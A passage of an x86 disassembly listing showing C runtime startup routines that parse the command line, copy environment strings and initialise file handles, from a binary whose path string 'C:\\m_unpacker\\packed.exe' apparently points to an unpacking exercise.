mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42F1D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F290 proc near ; CODE XREF: _0:004221CD�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
cmp ds:dword_4F4A2C, 0
jnz short loc_42F2A4
call sub_429890
loc_42F2A4: ; CODE XREF: sub_42F290+D�j
mov [ebp+var_8], 0
mov eax, ds:dword_4F3360
mov [ebp+var_4], eax
loc_42F2B3: ; CODE XREF: sub_42F290+57�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_42F2E9
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 3Dh
jz short loc_42F2D1
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
loc_42F2D1: ; CODE XREF: sub_42F290+36�j
mov eax, [ebp+var_4]
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp+var_4]
lea edx, [ecx+eax+1]
mov [ebp+var_4], edx
jmp short loc_42F2B3
; ---------------------------------------------------------------------------
loc_42F2E9: ; CODE XREF: sub_42F290+2B�j
push 6Dh
push offset dword_43D430
push 2
mov eax, [ebp+var_8]
lea ecx, ds:4[eax*4]
push ecx
call sub_41BE70
add esp, 10h
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
mov ds:dword_4F3314, edx
cmp ds:dword_4F3314, 0
jnz short loc_42F324
push 9
call sub_422270
add esp, 4
loc_42F324: ; CODE XREF: sub_42F290+88�j
mov eax, ds:dword_4F3360
mov [ebp+var_4], eax
jmp short loc_42F337
; ---------------------------------------------------------------------------
loc_42F32E: ; CODE XREF: sub_42F290:loc_42F3A5�j
mov ecx, [ebp+var_4]
add ecx, [ebp+var_10]
mov [ebp+var_4], ecx
loc_42F337: ; CODE XREF: sub_42F290+9C�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_42F3A7
mov ecx, [ebp+var_4]
push ecx
call sub_41BC70
add esp, 4
add eax, 1
mov [ebp+var_10], eax
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 3Dh
jz short loc_42F3A5
push 79h
push offset dword_43D430
push 2
mov ecx, [ebp+var_10]
push ecx
call sub_41BE70
add esp, 10h
mov edx, [ebp+var_C]
mov [edx], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax], 0
jnz short loc_42F38A
push 9
call sub_422270
add esp, 4
loc_42F38A: ; CODE XREF: sub_42F290+EE�j
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_C]
mov eax, [edx]
push eax
call sub_41F620
add esp, 8
mov ecx, [ebp+var_C]
add ecx, 4
mov [ebp+var_C], ecx
loc_42F3A5: ; CODE XREF: sub_42F290+CC�j
jmp short loc_42F32E
; ---------------------------------------------------------------------------
loc_42F3A7: ; CODE XREF: sub_42F290+AF�j
push 2
mov edx, ds:dword_4F3360
push edx
call sub_41CA10
add esp, 8
mov ds:dword_4F3360, 0
mov eax, [ebp+var_C]
mov dword ptr [eax], 0
mov ds:dword_4F4A28, 1
mov esp, ebp
pop ebp
retn
sub_42F290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F3E0 proc near ; CODE XREF: _0:004221C8�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
cmp ds:dword_4F4A2C, 0
jnz short loc_42F3F4
call sub_429890
loc_42F3F4: ; CODE XREF: sub_42F3E0+D�j
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call ds:off_4F5344
mov ds:off_4F3324, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
mov eax, ds:dword_4F4A24
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_42F427
mov edx, ds:off_4F3324
mov [ebp+var_14], edx
jmp short loc_42F42F
; ---------------------------------------------------------------------------
loc_42F427: ; CODE XREF: sub_42F3E0+3A�j
mov eax, ds:dword_4F4A24
mov [ebp+var_14], eax
loc_42F42F: ; CODE XREF: sub_42F3E0+45�j
mov ecx, [ebp+var_14]
mov [ebp+var_10], ecx
lea edx, [ebp+var_4]
push edx
lea eax, [ebp+var_C]
push eax
push 0
push 0
mov ecx, [ebp+var_10]
push ecx
call sub_42F4C0
add esp, 14h
push 80h
push offset dword_43D43C
push 2
mov edx, [ebp+var_C]
mov eax, [ebp+var_4]
lea ecx, [eax+edx*4]
push ecx
call sub_41BE70
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_42F47E
push 8
call sub_422270
add esp, 4
loc_42F47E: ; CODE XREF: sub_42F3E0+92�j
lea edx, [ebp+var_4]
push edx
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
lea eax, [edx+ecx*4]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_10]
push edx
call sub_42F4C0
add esp, 14h
mov eax, [ebp+var_C]
sub eax, 1
mov ds:dword_4F3308, eax
mov ecx, [ebp+var_8]
mov ds:dword_4F330C, ecx
mov esp, ebp
pop ebp
retn
sub_42F3E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F4C0 proc near ; CODE XREF: sub_42F3E0+65�p
; sub_42F3E0+B8�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_10]
mov dword ptr [eax], 0
mov ecx, [ebp+arg_C]
mov dword ptr [ecx], 1
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
cmp [ebp+arg_4], 0
jz short loc_42F4F5
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov [eax], ecx
mov edx, [ebp+arg_4]
add edx, 4
mov [ebp+arg_4], edx
loc_42F4F5: ; CODE XREF: sub_42F4C0+22�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 22h
jnz loc_42F5CD
loc_42F504: ; CODE XREF: sub_42F4C0:loc_42F58D�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 22h
jz short loc_42F592
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_42F592
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
xor eax, eax
mov al, ds:byte_4F38E1[edx]
and eax, 4
test eax, eax
jz short loc_42F567
mov ecx, [ebp+arg_10]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_10]
mov [eax], edx
cmp [ebp+arg_8], 0
jz short loc_42F567
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42F567: ; CODE XREF: sub_42F4C0+76�j
; sub_42F4C0+89�j
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
cmp [ebp+arg_8], 0
jz short loc_42F58D
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_42F58D: ; CODE XREF: sub_42F4C0+B8�j
jmp loc_42F504
; ---------------------------------------------------------------------------
loc_42F592: ; CODE XREF: sub_42F4C0+56�j
; sub_42F4C0+60�j
mov ecx, [ebp+arg_10]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_10]
mov [eax], edx
cmp [ebp+arg_8], 0
jz short loc_42F5B4
mov ecx, [ebp+arg_8]
mov byte ptr [ecx], 0
mov edx, [ebp+arg_8]
add edx, 1
mov [ebp+arg_8], edx
loc_42F5B4: ; CODE XREF: sub_42F4C0+E3�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 22h
jnz short loc_42F5C8
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42F5C8: ; CODE XREF: sub_42F4C0+FD�j
jmp loc_42F69C
; ---------------------------------------------------------------------------
loc_42F5CD: ; CODE XREF: sub_42F4C0+3E�j
; sub_42F4C0+1B1�j
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
cmp [ebp+arg_8], 0
jz short loc_42F5F3
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_42F5F3: ; CODE XREF: sub_42F4C0+11E�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_C]
and ecx, 0FFh
xor edx, edx
mov dl, ds:byte_4F38E1[ecx]
and edx, 4
test edx, edx
jz short loc_42F64B
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
cmp [ebp+arg_8], 0
jz short loc_42F642
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_42F642: ; CODE XREF: sub_42F4C0+16D�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42F64B: ; CODE XREF: sub_42F4C0+15A�j
mov edx, [ebp+var_C]
and edx, 0FFh
cmp edx, 20h
jz short loc_42F677
mov eax, [ebp+var_C]
and eax, 0FFh
test eax, eax
jz short loc_42F677
mov ecx, [ebp+var_C]
and ecx, 0FFh
cmp ecx, 9
jnz loc_42F5CD
loc_42F677: ; CODE XREF: sub_42F4C0+197�j
; sub_42F4C0+1A3�j
mov edx, [ebp+var_C]
and edx, 0FFh
test edx, edx
jnz short loc_42F68F
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
jmp short loc_42F69C
; ---------------------------------------------------------------------------
loc_42F68F: ; CODE XREF: sub_42F4C0+1C2�j
cmp [ebp+arg_8], 0
jz short loc_42F69C
mov ecx, [ebp+arg_8]
mov byte ptr [ecx-1], 0
loc_42F69C: ; CODE XREF: sub_42F4C0:loc_42F5C8�j
; sub_42F4C0+1CD�j ...
mov [ebp+var_14], 0
loc_42F6A3: ; CODE XREF: sub_42F4C0+3F6�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_42F6CE
loc_42F6AD: ; CODE XREF: sub_42F4C0+20C�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 20h
jz short loc_42F6C3
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 9
jnz short loc_42F6CE
loc_42F6C3: ; CODE XREF: sub_42F4C0+1F6�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_42F6AD
; ---------------------------------------------------------------------------
loc_42F6CE: ; CODE XREF: sub_42F4C0+1EB�j
; sub_42F4C0+201�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_42F6DD
jmp loc_42F8BB
; ---------------------------------------------------------------------------
loc_42F6DD: ; CODE XREF: sub_42F4C0+216�j
cmp [ebp+arg_4], 0
jz short loc_42F6F4
mov edx, [ebp+arg_4]
mov eax, [ebp+arg_8]
mov [edx], eax
mov ecx, [ebp+arg_4]
add ecx, 4
mov [ebp+arg_4], ecx
loc_42F6F4: ; CODE XREF: sub_42F4C0+221�j
mov edx, [ebp+arg_C]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_42F701: ; CODE XREF: sub_42F4C0+3CF�j
mov [ebp+var_8], 1
mov [ebp+var_10], 0
loc_42F70F: ; CODE XREF: sub_42F4C0+26C�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 5Ch
jnz short loc_42F72E
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
jmp short loc_42F70F
; ---------------------------------------------------------------------------
loc_42F72E: ; CODE XREF: sub_42F4C0+258�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 22h
jnz short loc_42F78A
mov eax, [ebp+var_10]
xor edx, edx
mov ecx, 2
div ecx
test edx, edx
jnz short loc_42F782
cmp [ebp+var_14], 0
jz short loc_42F76F
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx+1]
cmp eax, 22h
jnz short loc_42F766
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42F76D
; ---------------------------------------------------------------------------
loc_42F766: ; CODE XREF: sub_42F4C0+299�j
mov [ebp+var_8], 0
loc_42F76D: ; CODE XREF: sub_42F4C0+2A4�j
jmp short loc_42F776
; ---------------------------------------------------------------------------
loc_42F76F: ; CODE XREF: sub_42F4C0+28D�j
mov [ebp+var_8], 0
loc_42F776: ; CODE XREF: sub_42F4C0:loc_42F76D�j
xor edx, edx
cmp [ebp+var_14], 0
setz dl
mov [ebp+var_14], edx
loc_42F782: ; CODE XREF: sub_42F4C0+287�j
mov eax, [ebp+var_10]
shr eax, 1
mov [ebp+var_10], eax
loc_42F78A: ; CODE XREF: sub_42F4C0+277�j
; sub_42F4C0+2FC�j
mov ecx, [ebp+var_10]
mov edx, [ebp+var_10]
sub edx, 1
mov [ebp+var_10], edx
test ecx, ecx
jz short loc_42F7BE
cmp [ebp+arg_8], 0
jz short loc_42F7AF
mov eax, [ebp+arg_8]
mov byte ptr [eax], 5Ch
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
loc_42F7AF: ; CODE XREF: sub_42F4C0+2DE�j
mov edx, [ebp+arg_10]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_10]
mov [ecx], eax
jmp short loc_42F78A
; ---------------------------------------------------------------------------
loc_42F7BE: ; CODE XREF: sub_42F4C0+2D8�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_42F7E4
cmp [ebp+var_14], 0
jnz short loc_42F7E9
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 20h
jz short loc_42F7E4
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 9
jnz short loc_42F7E9
loc_42F7E4: ; CODE XREF: sub_42F4C0+306�j
; sub_42F4C0+317�j
jmp loc_42F894
; ---------------------------------------------------------------------------
loc_42F7E9: ; CODE XREF: sub_42F4C0+30C�j
; sub_42F4C0+322�j
cmp [ebp+var_8], 0
jz loc_42F886
cmp [ebp+arg_8], 0
jz short loc_42F84D
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
xor ecx, ecx
mov cl, ds:byte_4F38E1[eax]
and ecx, 4
test ecx, ecx
jz short loc_42F838
mov edx, [ebp+arg_8]
mov eax, [ebp+var_4]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
add edx, 1
mov [ebp+arg_8], edx
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+arg_10]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_10]
mov [eax], edx
loc_42F838: ; CODE XREF: sub_42F4C0+34D�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
jmp short loc_42F879
; ---------------------------------------------------------------------------
loc_42F84D: ; CODE XREF: sub_42F4C0+337�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
xor ecx, ecx
mov cl, ds:byte_4F38E1[eax]
and ecx, 4
test ecx, ecx
jz short loc_42F879
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
loc_42F879: ; CODE XREF: sub_42F4C0+38B�j
; sub_42F4C0+3A1�j
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
loc_42F886: ; CODE XREF: sub_42F4C0+32D�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp loc_42F701
; ---------------------------------------------------------------------------
loc_42F894: ; CODE XREF: sub_42F4C0:loc_42F7E4�j
cmp [ebp+arg_8], 0
jz short loc_42F8A9
mov ecx, [ebp+arg_8]
mov byte ptr [ecx], 0
mov edx, [ebp+arg_8]
add edx, 1
mov [ebp+arg_8], edx
loc_42F8A9: ; CODE XREF: sub_42F4C0+3D8�j
mov eax, [ebp+arg_10]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_10]
mov [edx], ecx
jmp loc_42F6A3
; ---------------------------------------------------------------------------
loc_42F8BB: ; CODE XREF: sub_42F4C0+218�j
cmp [ebp+arg_4], 0
jz short loc_42F8D3
mov eax, [ebp+arg_4]
mov dword ptr [eax], 0
mov ecx, [ebp+arg_4]
add ecx, 4
mov [ebp+arg_4], ecx
loc_42F8D3: ; CODE XREF: sub_42F4C0+3FF�j
mov edx, [ebp+arg_C]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov esp, ebp
pop ebp
retn
sub_42F4C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F8F0 proc near ; CODE XREF: _0:004221BE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_14], 0
mov [ebp+var_18], 0
cmp ds:dword_4F3524, 0
jnz short loc_42F94A
call ds:dword_4F531C ; GetEnvironmentStringsW
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_42F928
mov ds:dword_4F3524, 1
jmp short loc_42F94A
; ---------------------------------------------------------------------------
loc_42F928: ; CODE XREF: sub_42F8F0+2A�j
call ds:dword_4F5320 ; GetEnvironmentStrings
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_42F943
mov ds:dword_4F3524, 2
jmp short loc_42F94A
; ---------------------------------------------------------------------------
loc_42F943: ; CODE XREF: sub_42F8F0+45�j
xor eax, eax
jmp loc_42FB05
; ---------------------------------------------------------------------------
loc_42F94A: ; CODE XREF: sub_42F8F0+1B�j
; sub_42F8F0+36�j ...
cmp ds:dword_4F3524, 1
jnz loc_42FA4E
cmp [ebp+var_14], 0
jnz short loc_42F973
call ds:dword_4F531C ; GetEnvironmentStringsW
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_42F973
xor eax, eax
jmp loc_42FB05
; ---------------------------------------------------------------------------
loc_42F973: ; CODE XREF: sub_42F8F0+6B�j
; sub_42F8F0+7A�j
mov eax, [ebp+var_14]
mov [ebp+var_8], eax
loc_42F979: ; CODE XREF: sub_42F8F0:loc_42F9A3�j
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx]
test edx, edx
jz short loc_42F9A5
mov eax, [ebp+var_8]
add eax, 2
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx]
test edx, edx
jnz short loc_42F9A3
mov eax, [ebp+var_8]
add eax, 2
mov [ebp+var_8], eax
loc_42F9A3: ; CODE XREF: sub_42F8F0+A8�j
jmp short loc_42F979
; ---------------------------------------------------------------------------
loc_42F9A5: ; CODE XREF: sub_42F8F0+93�j
mov ecx, [ebp+var_8]
sub ecx, [ebp+var_14]
sar ecx, 1
add ecx, 1
mov [ebp+var_4], ecx
push 0
push 0
push 0
push 0
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_14]
push eax
push 0
push 0
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_42F9F4
push 64h
push offset dword_43D448
push 2
mov ecx, [ebp+var_10]
push ecx
call sub_41BE70
add esp, 10h
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_42FA05
loc_42F9F4: ; CODE XREF: sub_42F8F0+E4�j
mov edx, [ebp+var_14]
push edx
call ds:dword_4F5324 ; FreeEnvironmentStringsW
xor eax, eax
jmp loc_42FB05
; ---------------------------------------------------------------------------
loc_42FA05: ; CODE XREF: sub_42F8F0+102�j
push 0
push 0
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_14]
push eax
push 0
push 0
call ds:dword_4F5450 ; WideCharToMultiByte
test eax, eax
jnz short loc_42FA3C
push 2
mov ecx, [ebp+var_18]
push ecx
call sub_41CA10
add esp, 8
mov [ebp+var_18], 0
loc_42FA3C: ; CODE XREF: sub_42F8F0+135�j
mov edx, [ebp+var_14]
push edx
call ds:dword_4F5324 ; FreeEnvironmentStringsW
mov eax, [ebp+var_18]
jmp loc_42FB05
; ---------------------------------------------------------------------------
loc_42FA4E: ; CODE XREF: sub_42F8F0+61�j
cmp ds:dword_4F3524, 2
jnz loc_42FB03
cmp [ebp+var_18], 0
jnz short loc_42FA77
call ds:dword_4F5320 ; GetEnvironmentStrings
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_42FA77
xor eax, eax
jmp loc_42FB05
; ---------------------------------------------------------------------------
loc_42FA77: ; CODE XREF: sub_42F8F0+16F�j
; sub_42F8F0+17E�j
mov eax, [ebp+var_18]
mov [ebp+var_C], eax
loc_42FA7D: ; CODE XREF: sub_42F8F0:loc_42FAA3�j
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_42FAA5
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_42FAA3
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_42FAA3: ; CODE XREF: sub_42F8F0+1A8�j
jmp short loc_42FA7D
; ---------------------------------------------------------------------------
loc_42FAA5: ; CODE XREF: sub_42F8F0+195�j
mov ecx, [ebp+var_C]
sub ecx, [ebp+var_18]
add ecx, 1
mov [ebp+var_10], ecx
push 8Fh
push offset dword_43D448
push 2
mov edx, [ebp+var_10]
push edx
call sub_41BE70
add esp, 10h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_42FAE0
mov eax, [ebp+var_18]
push eax
call ds:dword_4F5328 ; FreeEnvironmentStringsA
xor eax, eax
jmp short loc_42FB05
; ---------------------------------------------------------------------------
loc_42FAE0: ; CODE XREF: sub_42F8F0+1E0�j
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_18]
push edx
mov eax, [ebp+var_C]
push eax
call sub_41FBF0
add esp, 0Ch
mov ecx, [ebp+var_18]
push ecx
call ds:dword_4F5328 ; FreeEnvironmentStringsA
mov eax, [ebp+var_C]
jmp short loc_42FB05
; ---------------------------------------------------------------------------
loc_42FB03: ; CODE XREF: sub_42F8F0+165�j
xor eax, eax
loc_42FB05: ; CODE XREF: sub_42F8F0+55�j
; sub_42F8F0+7E�j ...
mov esp, ebp
pop ebp
retn
sub_42F8F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FB10 proc near ; CODE XREF: _0:004221AE�p
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_16 = dword ptr -16h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 6Ch
push 81h
push offset dword_43D450
push 2
push 480h
call sub_41BE70
add esp, 10h
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jnz short loc_42FB42
push 1Bh
call sub_422270
add esp, 4
loc_42FB42: ; CODE XREF: sub_42FB10+26�j
mov eax, [ebp+var_50]
mov ds:dword_4F36C0, eax
mov ds:dword_4F37C0, 20h
jmp short loc_42FB5F
; ---------------------------------------------------------------------------
loc_42FB56: ; CODE XREF: sub_42FB10+81�j
mov ecx, [ebp+var_50]
add ecx, 24h
mov [ebp+var_50], ecx
loc_42FB5F: ; CODE XREF: sub_42FB10+44�j
mov edx, ds:dword_4F36C0
add edx, 480h
cmp [ebp+var_50], edx
jnb short loc_42FB93
mov eax, [ebp+var_50]
mov byte ptr [eax+4], 0
mov ecx, [ebp+var_50]
mov dword ptr [ecx], 0FFFFFFFFh
mov edx, [ebp+var_50]
mov byte ptr [edx+5], 0Ah
mov eax, [ebp+var_50]
mov dword ptr [eax+8], 0
jmp short loc_42FB56
; ---------------------------------------------------------------------------
loc_42FB93: ; CODE XREF: sub_42FB10+5E�j
lea ecx, [ebp+var_48]
push ecx
call ds:dword_4F548C ; GetStartupInfoA
mov edx, [ebp+var_16]
and edx, 0FFFFh
test edx, edx
jz loc_42FD35
cmp [ebp+var_16+2], 0
jz loc_42FD35
mov eax, [ebp+var_16+2]
mov ecx, [eax]
mov [ebp+var_64], ecx
mov edx, [ebp+var_16+2]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
add eax, [ebp+var_64]
mov [ebp+var_60], eax
cmp [ebp+var_64], 800h
jge short loc_42FBE3
mov ecx, [ebp+var_64]
mov [ebp+var_68], ecx
jmp short loc_42FBEA
; ---------------------------------------------------------------------------
loc_42FBE3: ; CODE XREF: sub_42FB10+C9�j
mov [ebp+var_68], 800h
loc_42FBEA: ; CODE XREF: sub_42FB10+D1�j
mov edx, [ebp+var_68]
mov [ebp+var_64], edx
mov [ebp+var_5C], 1
jmp short loc_42FC02
; ---------------------------------------------------------------------------
loc_42FBF9: ; CODE XREF: sub_42FB10:loc_42FC9D�j
mov eax, [ebp+var_5C]
add eax, 1
mov [ebp+var_5C], eax
loc_42FC02: ; CODE XREF: sub_42FB10+E7�j
mov ecx, ds:dword_4F37C0
cmp ecx, [ebp+var_64]
jge loc_42FCA2
push 0B6h
push offset dword_43D450
push 2
push 480h
call sub_41BE70
add esp, 10h
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jnz short loc_42FC3E
mov edx, ds:dword_4F37C0
mov [ebp+var_64], edx
jmp short loc_42FCA2
; ---------------------------------------------------------------------------
loc_42FC3E: ; CODE XREF: sub_42FB10+121�j
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_50]
mov ds:dword_4F36C0[eax*4], ecx
mov edx, ds:dword_4F37C0
add edx, 20h
mov ds:dword_4F37C0, edx
jmp short loc_42FC65
; ---------------------------------------------------------------------------
loc_42FC5C: ; CODE XREF: sub_42FB10+18B�j
mov eax, [ebp+var_50]
add eax, 24h
mov [ebp+var_50], eax
loc_42FC65: ; CODE XREF: sub_42FB10+14A�j
mov ecx, [ebp+var_5C]
mov edx, ds:dword_4F36C0[ecx*4]
add edx, 480h
cmp [ebp+var_50], edx
jnb short loc_42FC9D
mov eax, [ebp+var_50]
mov byte ptr [eax+4], 0
mov ecx, [ebp+var_50]
mov dword ptr [ecx], 0FFFFFFFFh
mov edx, [ebp+var_50]
mov byte ptr [edx+5], 0Ah
mov eax, [ebp+var_50]
mov dword ptr [eax+8], 0
jmp short loc_42FC5C
; ---------------------------------------------------------------------------
loc_42FC9D: ; CODE XREF: sub_42FB10+168�j
jmp loc_42FBF9
; ---------------------------------------------------------------------------
loc_42FCA2: ; CODE XREF: sub_42FB10+FB�j
; sub_42FB10+12C�j
mov [ebp+var_58], 0
jmp short loc_42FCC6
; ---------------------------------------------------------------------------
loc_42FCAB: ; CODE XREF: sub_42FB10:loc_42FD30�j
mov ecx, [ebp+var_58]
add ecx, 1
mov [ebp+var_58], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_60]
add eax, 4
mov [ebp+var_60], eax
loc_42FCC6: ; CODE XREF: sub_42FB10+199�j
mov ecx, [ebp+var_58]
cmp ecx, [ebp+var_64]
jge short loc_42FD35
mov edx, [ebp+var_60]
cmp dword ptr [edx], 0FFFFFFFFh
jz short loc_42FD30
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
and ecx, 1
test ecx, ecx
jz short loc_42FD30
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
and eax, 8
test eax, eax
jnz short loc_42FD00
mov ecx, [ebp+var_60]
mov edx, [ecx]
push edx
call ds:dword_4F5314 ; GetFileType
test eax, eax
jz short loc_42FD30
loc_42FD00: ; CODE XREF: sub_42FB10+1DE�j
mov eax, [ebp+var_58]
sar eax, 5
mov ecx, [ebp+var_58]
